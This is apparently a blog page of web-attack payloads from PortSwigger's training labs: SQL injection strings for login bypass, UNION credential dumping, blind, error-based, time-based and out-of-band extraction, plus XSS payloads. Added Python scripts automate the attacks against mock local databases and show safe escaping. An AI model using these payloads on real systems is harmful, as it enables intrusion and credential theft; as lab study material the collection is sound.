• Vulnerability payloads collected from the Burp Suite (PortSwigger) Web Security Academy labs


    1. SQL injection

    WHERE clause (the + signs are URL-encoded spaces; -- comments out the rest of the query)
    '+OR+1=1--
    Login bypass
    administrator'--
    UNION clause (first find the column count with NULLs, then which column accepts a string)
    '+UNION+SELECT+NULL--
    '+UNION+SELECT+NULL,NULL--
    '+UNION+SELECT+'abcdef',NULL,NULL--
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+username,+password+FROM+users--
    '+UNION+SELECT+NULL,'abc'--
    '+UNION+SELECT+NULL,username||'~'||password+FROM+users--
    Fingerprinting the database type (dual / v$version: Oracle; # comment and @@version: MySQL)
    '+UNION+SELECT+'abc','def'+FROM+dual--
    '+UNION+SELECT+BANNER,+NULL+FROM+v$version--
    '+UNION+SELECT+'abc','def'#
    '+UNION+SELECT+@@version,+NULL#
    Listing database contents (information_schema: MySQL, PostgreSQL, MSSQL)
    '+UNION+SELECT+'abc','def'--
    '+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--
    '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_abcdef'--
    '+UNION+SELECT+username_abcdef,+password_abcdef+FROM+users_abcdef--
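The UNION payloads above are the manual steps of one procedure: pad with NULL until the column count matches, find a column that is reflected on the page, then route the users table through it. The following is an added example (not code from the original page or from PortSwigger) that automates those three steps against a constructed in-memory SQLite stand-in for the lab's vulnerable product filter. Assumptions: the table and column names, the rendered page format, and the use of literal spaces instead of the URL-encoded + shown in the list; SQLite is also dynamically typed, so unlike Oracle or PostgreSQL a string in a numeric column does not error, which is why the reflection check below looks at the rendered page rather than at an error.

```python
import sqlite3


def build_db():
    """Constructed sample database standing in for the lab's shop database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products(name TEXT, price INTEGER, category TEXT);
        INSERT INTO products VALUES ('Widget', 10, 'Gifts'), ('Gadget', 20, 'Pets');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 's3cret'), ('wiener', 'peter');
    """)
    return conn


def vulnerable_page(conn, category):
    """Stand-in for the lab's /filter?category= handler (hypothetical).

    The parameter is concatenated straight into the query, which is the
    injection point. Only name and category are rendered, so the price column
    is never visible on the page. Returns the page text, or None on a query
    error (the real app would answer HTTP 500)."""
    sql = ("SELECT name, price, category FROM products "
           "WHERE category = '" + category + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "\n".join(f"{name} [{cat}]" for name, _price, cat in rows)


def count_columns(page, max_cols=10):
    """Step 1: add NULLs until the UNION stops erroring (' UNION SELECT NULL,NULL--)."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if page(f"Gifts' UNION SELECT {nulls}--") is not None:
            return n
    raise RuntimeError("column count not found")


def find_string_columns(page, ncols, marker="abcdef"):
    """Step 2: put a marker string in each column position in turn and record
    which positions show up in the rendered page (' UNION SELECT 'abcdef',NULL,NULL--)."""
    hits = []
    for i in range(ncols):
        cols = ["NULL"] * ncols
        cols[i] = f"'{marker}'"
        out = page(f"Gifts' UNION SELECT {','.join(cols)}--")
        if out is not None and marker in out:
            hits.append(i)
    return hits


def dump_users(page, ncols, col):
    """Step 3: concatenate username~password into a reflected column
    (' UNION SELECT username||'~'||password,NULL,NULL FROM users--)."""
    cols = ["NULL"] * ncols
    cols[col] = "username || '~' || password"
    out = page(f"Gifts' UNION SELECT {','.join(cols)} FROM users--")
    creds = {}
    for line in out.splitlines():
        if "~" in line:
            user, pw = line.split(" [")[0].split("~", 1)
            creds[user] = pw
    return creds


def run_union_attack():
    conn = build_db()
    page = lambda payload: vulnerable_page(conn, payload)
    ncols = count_columns(page)
    reflected = find_string_columns(page, ncols)
    creds = dump_users(page, ncols, reflected[0])
    return ncols, reflected, creds


if __name__ == "__main__":
    print(run_union_attack())
```

On a real target the `page` callable is an HTTP request; the `--` comment is what makes the trailing quote of the original query harmless, so keep it even when the probe appears to work without it.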
    Boolean-based blind injection (the page shows "Welcome back" only when the condition is true; §a§ marks a Burp Intruder payload position)
    TrackingId=xyz' AND '1'='1
    TrackingId=xyz' AND '1'='2
    TrackingId=xyz' AND (SELECT 'a' FROM users LIMIT 1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>1)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>2)='a
    TrackingId=xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND LENGTH(password)>3)='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='a
    TrackingId=xyz' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='administrator')='§a§
    TrackingId=xyz' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='administrator')='a

    Blind injection via conditional errors (Oracle: TO_CHAR(1/0) raises a divide-by-zero error only when the CASE branch is taken)
    TrackingId=xyz'
    TrackingId=xyz''
    TrackingId=xyz'||(SELECT '')||'
    TrackingId=xyz'||(SELECT '' FROM dual)||'
    TrackingId=xyz'||(SELECT '' FROM not-a-real-table)||'
    TrackingId=xyz'||(SELECT '' FROM users WHERE ROWNUM = 1)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
    TrackingId=xyz'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>1 THEN to_char(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>2 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN LENGTH(password)>3 THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='a' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,1,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    TrackingId=xyz'||(SELECT CASE WHEN SUBSTR(password,2,1)='§a§' THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
    Time-based blind injection (PostgreSQL; %3B is a URL-encoded semicolon that starts a second, stacked statement)
    TrackingId=x'||pg_sleep(10)--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(1=2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>1)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>2)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+LENGTH(password)>3)+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='a')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,1,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
    TrackingId=x'%3BSELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,2,1)='§a§')+THEN+pg_sleep(10)+ELSE+pg_sleep(0)+END+FROM+users--
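The three blind sections above (boolean, conditional error, time delay) all run the same extraction loop: learn the password length with LENGTH(password)>n, then test one character at a time; only the way true/false is observed differs. The following is an added example (not from the original page or from PortSwigger) that runs that loop with a boolean oracle against a constructed in-memory SQLite stand-in for the lab's TrackingId cookie check, and replaces the linear 1, 2, 3, ... and a, b, c, ... probing of the list with a binary search. Assumptions: the table names, the made-up administrator password, and SQLite's unicode()/substr() functions in place of the list's SUBSTRING (PostgreSQL would use ascii(SUBSTRING(...)), Oracle ASCII(SUBSTR(...))). A timing oracle or an error oracle plugs into the same oracle(condition) interface.

```python
import sqlite3


def build_db():
    """Constructed sample database; the administrator password is made up."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE tracking(id TEXT);
        INSERT INTO tracking VALUES ('xyz');
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('administrator', 'Qx7#mellow'), ('wiener', 'peter');
    """)
    return conn


def welcome_back(conn, tracking_id):
    """Stand-in for the lab's cookie handler (hypothetical): the TrackingId cookie
    is concatenated into the query and the page says "Welcome back!" when any
    row matches. No query result is displayed, which is what makes it blind."""
    sql = "SELECT id FROM tracking WHERE id = '" + tracking_id + "'"
    return conn.execute(sql).fetchone() is not None


def make_boolean_oracle(conn):
    """Wrap a SQL condition in the list's
    xyz' AND (SELECT 'a' FROM users WHERE username='administrator' AND ...)='a
    pattern and report whether the page said "Welcome back!". A pg_sleep timing
    oracle or a TO_CHAR(1/0) error oracle has the same signature."""
    def oracle(condition):
        oracle.calls += 1
        payload = ("xyz' AND (SELECT 'a' FROM users WHERE username='administrator' "
                   f"AND {condition})='a")
        return welcome_back(conn, payload)
    oracle.calls = 0
    return oracle


def find_length(oracle, max_len=64):
    """Binary search on LENGTH(password)>n. Invariant: lo < length <= hi."""
    lo, hi = 0, max_len
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f"LENGTH(password)>{mid}"):
            lo = mid
        else:
            hi = mid
    return hi


def find_char(oracle, pos):
    """Binary search on the code point of the character at 1-based position pos.
    Comparing numbers rather than letters keeps the search case-sensitive
    (a case-insensitive collation would otherwise merge 'a' and 'A').
    Printable ASCII (32..126) is assumed. Invariant: lo < code point <= hi."""
    lo, hi = 31, 126
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(f"unicode(substr(password,{pos},1))>{mid}"):
            lo = mid
        else:
            hi = mid
    return chr(hi)


def extract_password(oracle):
    length = find_length(oracle)
    return "".join(find_char(oracle, i) for i in range(1, length + 1))


def run_blind_attack():
    oracle = make_boolean_oracle(build_db())
    password = extract_password(oracle)
    return password, oracle.calls


if __name__ == "__main__":
    pw, n = run_blind_attack()
    print(f"recovered {pw!r} in {n} requests")
```

Each character costs about seven requests instead of up to ninety-five, which matters most for the time-based variant where every true answer is a ten-second sleep.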
    Out-of-band (OAST) injection via XXE in Oracle's EXTRACTVALUE (the <!DOCTYPE> entity declaration was stripped when this page was extracted; it is reconstructed below with YOUR-COLLABORATOR-HOST as a placeholder to replace with a Burp Collaborator host)
    TrackingId=x'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//YOUR-COLLABORATOR-HOST/">+%25remote%3b]>'),'/l')+FROM+dual--

    2. XSS

    "> (the tag that followed was stripped when this page was extracted)

    javascript:alert(document.cookie)

    "onmouseover="alert(1)

    '-alert(1)-'

    product?productId=1&storeId="> (the tag that followed was stripped when this page was extracted)

    {{$on.constructor('alert(1)')()}}

    \'-alert(1)//

    ${alert(1)}
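Each XSS payload above is shaped by the context it is reflected into: "onmouseover="alert(1) closes an attribute value, '-alert(1)-' closes a JavaScript string, and \'-alert(1)// is the variant for when the server escapes the quote but not the backslash. The following is an added example (not code from the original page or from PortSwigger) that renders two of those contexts with constructed templates, checks the output the way a browser would tokenize it, and shows the escaping that actually holds. Assumptions: the template strings, and that the standard library's html.parser splits attributes the same way a browser does for this input.

```python
import html
import json
from html.parser import HTMLParser

# Payloads taken from the list above.
ATTR_PAYLOAD = '"onmouseover="alert(1)'
JS_PAYLOAD = "'-alert(1)-'"
JS_BACKSLASH_PAYLOAD = "\\'-alert(1)//"   # the list's \'-alert(1)// payload


# --- attribute context: <input value="..."> ---------------------------------
def render_attr_unsafe(value):
    return f'<input type="text" name="search" value="{value}">'


def render_attr_safe(value):
    # quote=True turns " into &quot; so the value cannot close the attribute.
    return f'<input type="text" name="search" value="{html.escape(value, quote=True)}">'


def input_attributes(markup):
    """Tokenize the rendered tag as a browser would and return the <input>
    attributes; an injected onmouseover shows up as its own attribute."""
    found = {}

    class Collector(HTMLParser):
        def handle_starttag(self, tag, attrs):
            if tag == "input":
                found.update(attrs)

    Collector().feed(markup)
    return found


# --- JavaScript string context: var searchTerms = '...' ---------------------
def render_js_unsafe(value):
    return f"<script>var searchTerms = '{value}';</script>"


def render_js_backslash_only(value):
    # A common but insufficient fix: escape the quote, leave the backslash alone.
    return render_js_unsafe(value.replace("'", "\\'"))


def render_js_safe(value):
    # json.dumps yields a double-quoted JS literal with quotes, backslashes and
    # control characters escaped; '<' is escaped too so '</script>' cannot close the tag.
    literal = json.dumps(value).replace("<", "\\u003c")
    return f"<script>var searchTerms = {literal};</script>"


def code_after_literal(script):
    """Lex the string literal after 'var searchTerms = ' the way a JS lexer would
    (honouring backslash escapes) and return any code left before the ';'.
    An empty result means the payload stayed inside the string."""
    start = script.index("= ") + 2
    quote = script[start]
    i = start + 1
    while i < len(script):
        c = script[i]
        if c == "\\":
            i += 2          # escaped character, skip it
            continue
        if c == quote:
            break
        i += 1
    tail = script[i + 1:script.index("</script>")]
    return tail.rstrip(";").strip()


def run_xss_contexts():
    return {
        "attr_unsafe_has_handler": "onmouseover" in input_attributes(render_attr_unsafe(ATTR_PAYLOAD)),
        "attr_safe_has_handler": "onmouseover" in input_attributes(render_attr_safe(ATTR_PAYLOAD)),
        "js_unsafe": code_after_literal(render_js_unsafe(JS_PAYLOAD)),
        "js_backslash_only": code_after_literal(render_js_backslash_only(JS_BACKSLASH_PAYLOAD)),
        "js_safe": code_after_literal(render_js_safe(JS_BACKSLASH_PAYLOAD)),
    }


if __name__ == "__main__":
    for name, result in run_xss_contexts().items():
        print(f"{name}: {result!r}")
```

The backslash-only case is the one worth remembering: escaping ' to \' turns \' into \\', the first backslash escapes the second, and the quote is live again, which is exactly what \'-alert(1)// relies on.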

  • Original URL: https://blog.csdn.net/tainqiuer123/article/details/125887065